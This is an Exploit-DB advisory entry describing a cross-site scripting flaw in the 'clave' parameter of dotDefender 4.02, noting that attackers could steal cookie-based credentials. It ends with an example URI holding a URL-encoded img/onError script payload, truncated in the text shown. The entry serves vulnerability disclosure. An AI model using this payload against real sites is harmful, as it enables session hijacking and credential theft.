dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting Vulnerability

2010-07-12T00:00:00
ID EDB-ID:34293
Type exploitdb
Reporter David K
Modified 2010-07-12T00:00:00

Description

dotDefender 4.02 'clave' Parameter Cross Site Scripting Vulnerability. Webapps exploit for java platform

                                        
                                            source: http://www.securityfocus.com/bid/41541/info

dotDefender is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

dotDefender 4.02 is vulnerable; other versions may also be affected. 

The following example URI is available:

http://www.example.com/oportunidades/presencial/buscador/sinresultado/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{